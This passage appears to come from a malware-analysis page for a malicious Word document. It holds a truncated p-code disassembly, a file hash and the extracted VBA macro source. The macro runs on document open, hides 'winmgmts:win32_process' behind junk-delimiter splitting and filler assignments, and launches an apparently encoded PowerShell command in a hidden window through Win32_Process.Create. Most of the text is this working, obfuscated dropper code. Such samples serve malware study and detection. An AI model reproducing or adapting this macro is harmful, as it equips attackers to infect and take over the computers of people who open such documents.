HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #64: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #65: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #66: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #67: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #68: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #69: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #70: ' SetStmt ' Ld Nvaqkmyiymb ' ArgsLd Yddwdalk 0x0001 ' Set Qccafrtde ' Line #71: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #72: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #73: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #74: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #75: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #76: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #77: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #78: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #79: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #80: ' LineCont 0x0004 03 00 00 00 ' Ld Create ' Ld khknasas ' Add ' Ld Dwbdfdaieqnpc ' Add ' Ld nbswe ' Ld Qccafrtde ' Ld Oiobkuwqsy ' ArgsMemCall (Call) Vyirvuquvu 0x0003 ' Line #81: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #82: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #83: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #84: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #85: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #86: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #87: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #88: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #89: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #90: ' EndFunc ' Line #91: ' FuncDefn (Function Yddwdalk(Qvnzlczddco)) ' Line #92: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #93: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #94: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #95: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #96: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #97: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #98: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #99: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #100: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #101: ' SetStmt ' Ld Qvnzlczddco ' ArgsLd Szsuprxwu 0x0001 ' Set Yddwdalk ' Line #102: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #103: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #104: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #105: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #106: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #107: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #108: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #109: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #110: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #111: ' LineCont 0x0004 02 00 00 00 ' Ld showwindow ' Ld Rqhjugji ' Add ' Ld Yddwdalk ' MemSt Dqtbehgj ' Line #112: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #113: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #114: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #115: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #116: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #117: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #118: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #119: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #120: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #121: ' EndFunc ' Line #122: ' FuncDefn (Function Wyvieuwpopbd(Actinokzknau)) ' Line #123: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #124: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #125: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #126: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #127: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #128: ' LitStr 0x000A "zSzItGhKYQ" …

SHA-256: 171b710578c0d5f990c6710b1eae42f20e1e8c2c0052728abb4a4cd29e2d61c2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Bauiwbxvwwp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Zoqazakuxfsa.Hpqcquqbbiaa
End Sub

Attribute VB_Name = "Oxuzrzcyuqz"
Attribute VB_Base = "0{8F6D337A-5DE8-48B3-B74A-94AF8030D19A}{02F8F909-73DA-407A-BA7C-56FAE01F69FE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ltvtvvmlva"
Attribute VB_Base = "0{7AAFCB00-977A-4352-A6B0-87F71B61DF84}{74EF03E2-C6EE-4D1F-B811-1AAF1C239276}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ipnhlkcafs()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Jcmbwkfpiml"
Attribute VB_Base = "0{572F5F51-B8B9-4209-AC42-D41A45BE404D}{08ECDB5E-A613-4D0E-AE0A-790E9FCB0420}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Flxhjxdv()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Eegfjped"
Attribute VB_Base = "0{99959E7E-84FE-414F-A7D3-209D49CEFEB9}{2969A8EF-155C-45C8-97C5-92F7331D9F02}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Fjsjlpkvma()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Bdgyeswv"
Attribute VB_Base = "0{3A0E6CFA-5374-4119-969E-481C38E449EF}{63E8632C-858A-4978-9973-D4A2ABD2C966}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ebixqfvzdisa()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Towuniiefadd"
Attribute VB_Base = "0{E1346B7F-ACAA-4DA9-B04E-BAD3DBC3A54E}{ACA6E90A-2000-4029-B89B-C60C1FEAE7DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kmhxfkfqao()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Zmxmkafkf"
Attribute VB_Base = "0{60AF3345-9FDE-4DE1-837E-C0CEC50A3CA2}{B86ABB70-DED0-48A6-B0EB-0E4D9C244A86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Bhwmzwhumgko()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Uvnpcniv"
Attribute VB_Base = "0{A41C6ABE-5B00-4E45-9D23-EE955A4F2834}{E708A6BC-58BF-4862-AF94-89924E09C8C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Vhspcyofur()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Zoqazakuxfsa"
Function Hpqcquqbbiaa()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Bhwtsprjd = "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){" + ChrW(Oxuzrzcyuqz.Zoom + 15) + ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){" + Oxuzrzcyuqz.Rkgrnwuuc + "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Wyvieuwpopbd = Oiobkuwqsy(Bhwtsprjd)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Szsuprxwu = CreateObject(Wyvieuwpopbd)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Dygqqlldxn = Oxuzrzcyuqz.Wldlltzabxia.Tag
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Loglemsf = Wyvieuwpopbd + ChrW(Oxuzrzcyuqz.Zoom + 15) + Oxuzrzcyuqz.Nvaqkmyiymb.Tag + Dygqqlldxn
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Qccafrtde = Loglemsf + Oxuzrzcyuqz.Rkgrnwuuc
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Yddwdalk = Vyirvuquvu(Qccafrtde)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Call Szsuprxwu. _
Create(khknasas + Dwbdfdaieqnpc + nbswe, Qvnzlczddco, Yddwdalk)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Vyirvuquvu(Dqtbehgj)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Vyirvuquvu = CreateObject(Dqtbehgj)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Vyirvuquvu. _
showwindow = Rqhjugji + Actinokzknau
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Oiobkuwqsy(Wfinndsyt)
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Oiobkuwqsy = CVar(Join(Split(Wfinndsyt, "}&*$**(){"), NoLineBreakAfter))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Dwbdfdaieqnpc()
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
nnannauwe = "}&*$**(){ }&*$**(){-}&*$**(){e}&*$**(){ }&*$**(){"
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Lvlwmpwkmr = ChrW(Int(wdKeyP))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Grawwoqo = Lvlwmpwkmr + Oxuzrzcyuqz.Ngytvueo.ControlTipText + nnannauwe
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
dkhiqwhnkew = Oxuzrzcyuqz.Eqbswmtp.Pages(0).Caption
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Dwbdfdaieqnpc = Oiobkuwqsy(Grawwoqo + StrReverse(dkhiqwhnkew))
   HgKlHeRxyx = Trim$("    fpCzbOrrBK       ")
eYCgTHbUrq = Trim$("    kSTokTqrAE       ")
AepzxwaawS = Trim$("    vcNMCvZAtj       ")
hRoTwUiEiW = Trim$("    GeEhhzvoze       ")
wqPQZAJhhx = Trim$("    wjOhwARgBL       ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function


' Processing file: /opt/analyzer/scan_staging/53fb3e572c0744dd91b9e94117ca8c32.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Bauiwbxvwwp - 1907 bytes
' Line #0:
' 	FuncDefn (Private Sub Bauiwbxvwwp())
' Line #1:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #2:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #3:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #4:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #5:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #6:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #7:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #8:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #9:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #10:
' 	Ld FlAUEmBDUn 
' 	ArgsMemCall Zoqazakuxfsa 0x0000 
' Line #11:
' 	EndSub 
' Macros/VBA/Oxuzrzcyuqz - 1169 bytes
' Macros/VBA/Ltvtvvmlva - 1395 bytes
' Line #0:
' 	FuncDefn (Sub Ipnhlkcafs())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Jcmbwkfpiml - 1392 bytes
' Line #0:
' 	FuncDefn (Sub Flxhjxdv())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Eegfjped - 1394 bytes
' Line #0:
' 	FuncDefn (Sub Fjsjlpkvma())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Bdgyeswv - 1396 bytes
' Line #0:
' 	FuncDefn (Sub Ebixqfvzdisa())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Towuniiefadd - 1396 bytes
' Line #0:
' 	FuncDefn (Sub Kmhxfkfqao())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Zmxmkafkf - 1397 bytes
' Line #0:
' 	FuncDefn (Sub Bhwmzwhumgko())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Uvnpcniv - 1394 bytes
' Line #0:
' 	FuncDefn (Sub Vhspcyofur())
' Line #1:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0007 "NXBUWWD"
' 	Ld DDD 
' 	Add 
' 	LitStr 0x0005 "pOLON"
' 	Add 
' 	PrintItemNL 
' Line #2:
' 	EndSub 
' Macros/VBA/Zoqazakuxfsa - 11840 bytes
' Line #0:
' 	FuncDefn (Function Zoqazakuxfsa())
' Line #1:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #2:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #3:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #4:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #5:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #6:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #7:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #8:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #9:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #10:
' 	LitStr 0x006A "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){"
' 	Ld Oxuzrzcyuqz 
' 	MemLd ChrW 
' 	LitDI2 0x000F 
' 	Add 
' 	ArgsLd Bhwtsprjd 0x0001 
' 	Add 
